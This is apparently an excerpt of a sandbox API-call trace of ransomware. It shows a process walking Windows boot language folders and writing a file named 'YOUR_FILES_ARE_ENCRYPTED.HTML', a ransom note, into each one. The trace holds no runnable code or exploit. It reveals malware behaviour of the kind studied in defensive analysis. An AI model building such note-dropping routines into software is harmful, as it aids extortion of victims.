GetProcessHeap () returned 0x600000 [0104.629] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.630] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\nb-NO" | out: lpString1="\\\\?\\C:\\Boot\\nb-NO") returned="\\\\?\\C:\\Boot\\nb-NO" [0104.630] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\nb-NO", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\nb-NO\\*") returned="\\\\?\\C:\\Boot\\nb-NO\\*" [0104.630] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nb-NO\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0104.630] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.630] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.630] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.630] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 33 [0104.630] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.630] lstrlenW (lpString=".mui") returned 4 [0104.630] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.630] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.630] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.631] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\memtest.exe.mui") returned 33 [0104.631] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.631] lstrlenW (lpString=".mui") returned 4 [0104.631] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.631] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.631] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0104.631] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.631] GetProcessHeap () returned 0x600000 [0104.631] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.631] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\nb-no\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.633] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.634] CloseHandle (hObject=0x300) returned 1 [0104.634] GetProcessHeap () returned 0x600000 [0104.634] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.634] GetProcessHeap () returned 0x600000 [0104.634] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.635] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0104.635] StrStrIW (lpFirst="nl-NL", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.635] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL") returned 17 [0104.635] GetProcessHeap () returned 0x600000 [0104.635] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.637] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\nl-NL" | out: lpString1="\\\\?\\C:\\Boot\\nl-NL") returned="\\\\?\\C:\\Boot\\nl-NL" [0104.637] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\nl-NL", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\nl-NL\\*") returned="\\\\?\\C:\\Boot\\nl-NL\\*" [0104.637] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nl-NL\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0104.637] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.637] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13160, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.638] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.638] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 33 [0104.638] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.638] lstrlenW (lpString=".mui") returned 4 [0104.638] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.638] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb158, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.638] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.638] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\memtest.exe.mui") returned 33 [0104.638] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.638] lstrlenW (lpString=".mui") returned 4 [0104.638] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.638] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb158, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.638] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0104.638] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.638] GetProcessHeap () returned 0x600000 [0104.638] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.638] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\nl-nl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.639] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.640] CloseHandle (hObject=0x300) returned 1 [0104.640] GetProcessHeap () returned 0x600000 [0104.640] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.641] GetProcessHeap () returned 0x600000 [0104.641] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.641] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0104.641] StrStrIW (lpFirst="pl-PL", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.641] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL") returned 17 [0104.641] GetProcessHeap () returned 0x600000 [0104.641] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.642] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\pl-PL" | out: lpString1="\\\\?\\C:\\Boot\\pl-PL") returned="\\\\?\\C:\\Boot\\pl-PL" [0104.642] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pl-PL", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\pl-PL\\*") returned="\\\\?\\C:\\Boot\\pl-PL\\*" [0104.642] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pl-PL\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0104.643] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.643] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f58, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.643] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.643] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 33 [0104.643] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.643] lstrlenW (lpString=".mui") returned 4 [0104.643] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.643] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.643] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.643] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\memtest.exe.mui") returned 33 [0104.643] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.643] lstrlenW (lpString=".mui") returned 4 [0104.643] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.643] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.643] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0104.643] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.643] GetProcessHeap () returned 0x600000 [0104.643] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.643] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\pl-pl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.645] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.646] CloseHandle (hObject=0x300) returned 1 [0104.646] GetProcessHeap () returned 0x600000 [0104.646] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.646] GetProcessHeap () returned 0x600000 [0104.646] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.647] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0104.647] StrStrIW (lpFirst="pt-BR", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.647] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR") returned 17 [0104.647] GetProcessHeap () returned 0x600000 [0104.647] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.648] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\pt-BR" | out: lpString1="\\\\?\\C:\\Boot\\pt-BR") returned="\\\\?\\C:\\Boot\\pt-BR" [0104.648] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pt-BR", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\pt-BR\\*") returned="\\\\?\\C:\\Boot\\pt-BR\\*" [0104.648] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-BR\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0104.648] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.648] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.648] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.648] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 33 [0104.648] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.648] lstrlenW (lpString=".mui") returned 4 [0104.648] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.648] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.648] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.648] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\memtest.exe.mui") returned 33 [0104.648] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.648] lstrlenW (lpString=".mui") returned 4 [0104.648] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.648] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.648] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0104.648] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.648] GetProcessHeap () returned 0x600000 [0104.648] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.649] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\pt-br\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.650] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.651] CloseHandle (hObject=0x300) returned 1 [0104.651] GetProcessHeap () returned 0x600000 [0104.651] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.651] GetProcessHeap () returned 0x600000 [0104.651] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.652] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0104.652] StrStrIW (lpFirst="pt-PT", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.652] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT") returned 17 [0104.652] GetProcessHeap () returned 0x600000 [0104.652] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.653] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\pt-PT" | out: lpString1="\\\\?\\C:\\Boot\\pt-PT") returned="\\\\?\\C:\\Boot\\pt-PT" [0104.653] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pt-PT", 